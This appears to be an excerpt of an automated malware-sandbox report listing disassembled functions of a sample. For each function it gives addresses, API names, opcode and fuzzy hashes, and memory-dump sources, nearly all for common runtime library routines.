                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                          • Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                          • Instruction ID: e576ca3d9aa75ce997e17549934f4332a650dfbd6ac9e6eec192770e02ca92a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                          • Instruction Fuzzy Hash: 51313072609B8199EB609F61E8503EEB364FF44748F84443ADA4D47B95DF39D648C720
                                                                                                                                                                          Function 00007FF70ECFAC68 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                          • Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                          • Instruction ID: 29c3942f28606303345fd3db3b976afe41d67084561841d6d1301b6ce16ab9c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                          • Instruction Fuzzy Hash: A4318232618B8196DB20DF25EC503AEB7A4FF88754F940136EA9D43B55DF3DC5458B10
                                                                                                                                                                          Function 00007FF70ED02F24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF70ED02F54
                                                                                                                                                                            • Part of subcall function 00007FF70ECFAEC4: GetCurrentProcess.KERNEL32(00007FF70ED0415D), ref: 00007FF70ECFAEF1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                          • API String ID: 2518042432-3972193922
                                                                                                                                                                          • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                          • Instruction ID: 348d7f10c9c2bee9766f04da593ce7f5cd8b2ef9ce79bc2c197334548ff3546b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                          • Instruction Fuzzy Hash: AD51F362B15B9585EB10EFA29C006FDA7A4FF48BD8B984536DE1D97B85DF3CD0428320
                                                                                                                                                                          Function 00007FF70ED05510 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy_s
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                                                          • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                          • Instruction ID: 904223523dc95e1981066ae9fee1f871a1a34a0d00370d2ab53b0d4c1e4d795a
                                                                                                                                                                          • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED19232B1928687DB34DF15F5847AAB7A1FB88784F988134DF4A97B44DB3DE8418B10
                                                                                                                                                                          Function 00007FF70ECD3BF8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF70ECDFD53), ref: 00007FF70ECD3C05
                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF70ECDFD53), ref: 00007FF70ECD3C39
                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF70ECDFD53), ref: 00007FF70ECD3C63
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1365068426-0
                                                                                                                                                                          • Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                          • Instruction ID: 12f31fde12f6e07135a0633e27057f0e29922b5d820ca7d071be1274deff4fcf
                                                                                                                                                                          • Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                          • Instruction Fuzzy Hash: 08012C7170C78692E710AB26B88027BE391FF89BC0F884135EA8D87B59DF3DD5058710
                                                                                                                                                                          Function 00007FF70ED03130 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .
                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                          • Opcode ID: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                                                                                                                                                          • Instruction ID: 4e5361191a1981d5d6a566072d457051bc447fd58a9e1e6ced12fd61309db79e
                                                                                                                                                                          • Opcode Fuzzy Hash: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                                                                                                                                                          • Instruction Fuzzy Hash: C631EA22B1869155E720AB36DC057AAAB91EF44BE4F488635EE6C47BC5CF3CD5118300
                                                                                                                                                                          Function 00007FF70ED09008 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                                          • Opcode ID: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                                                                                                                                                          • Instruction ID: 09c1f90e98f62ad245c4159527e9750a4c0a2d5183a10c3895a5b14178c38f57
                                                                                                                                                                          • Opcode Fuzzy Hash: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                                                                                                                                                          • Instruction Fuzzy Hash: 85B18B73604B888BEB15CF29C89536CBBA0FBC4B48F588831DA5D837A5CB39D451C710
                                                                                                                                                                          Function 00007FF70ECECA30 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1061551593-0
                                                                                                                                                                          • Opcode ID: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                                                                                                                                                          • Instruction ID: 4d1bc43e256d5ef45fafa4f8cd2207401fa22607af83722285fb62f17ccb3128
                                                                                                                                                                          • Opcode Fuzzy Hash: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                                                                                                                                                          • Instruction Fuzzy Hash: B7813A36B18A458AEB10DB6AD840AAEB771FF88B88B544132DE0D57764DF3DD105C750
                                                                                                                                                                          Function 00007FF70ECEDE44 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2169056816-0
                                                                                                                                                                          • Opcode ID: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                                                                                                                                                          • Instruction ID: 9b873fe0773757e6305041d21420e430c23e3319d953b4a3e7db23bdc194d3b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C114F72A18B85A5E721AF21E8503EAB361FF88B44FC44135DA8D43B64DF3CE646C754
                                                                                                                                                                          Function 00007FF70ECD6768 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                                                                                                                                          • Instruction ID: 7437293c11f6e26d2c2a0eca2df9345381e71f6b40c1cc32fbd897e0dda1fb52
                                                                                                                                                                          • Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                                                                                                                                          • Instruction Fuzzy Hash: 50014475A0C5469BE628EB10EC5037AB3A1FF98364F910239E68E477A4DF3DE5018E20
                                                                                                                                                                          Function 00007FF70ECFC074 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3215553584-4108050209
                                                                                                                                                                          • Opcode ID: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                          • Instruction ID: 0ddb2a2c4c0aa71dee5a9ad05d8ba569ffb91dc500ec7795237044a432e2a3c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B812822B1C10A66EBB8AA158860EBFE390EF41744FD45531ED0987695CF3FE856C268
                                                                                                                                                                          Function 00007FF70ECFBDF8 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3215553584-4108050209
                                                                                                                                                                          • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                          • Instruction ID: 166570f52916a37d722c6cf3efb1483ca396a5dea5cdad0c9d71bb20c76809a6
                                                                                                                                                                          • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                          • Instruction Fuzzy Hash: A7711525B0C24666FB68AA29C8706BFE3909F41744F940531DE0D87AD6CF3FEC468B61
                                                                                                                                                                          Function 00007FF70ECFFD18 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                          • Opcode ID: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                          • Instruction ID: c362ad4c0589df3349e338e3c13a6d6f039b813114788dd8cc8c8bbfbf862bd0
                                                                                                                                                                          • Opcode Fuzzy Hash: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                          • Instruction Fuzzy Hash: F441C232714A4486EE44EF2AD8642ADB3A1EB58FD0B8D9036EE4D87754EF3DD042C300
                                                                                                                                                                          Function 00007FF70ED041B0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                          • Opcode ID: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                          • Instruction ID: 7cbe41082b2786658aace3d665031738d20c64dcacd8eeab6182a97836fded6e
                                                                                                                                                                          • Opcode Fuzzy Hash: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EB09224E0BA06C6EA083B216C8221862A8BF48700FD8803AC04C82320DF2C24A58B20
                                                                                                                                                                          Function 00007FF70ECDBF0C Relevance: .6, Instructions: 587COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                          • Instruction ID: 7ef1720ece56d9b34aff9da24f7f63e2ecf6f925c372663054388971cab6ef8f
                                                                                                                                                                          • Opcode Fuzzy Hash: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                          • Instruction Fuzzy Hash: B922E3B3B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB785DB39D505CB40
                                                                                                                                                                          Function 00007FF70ECDB318 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
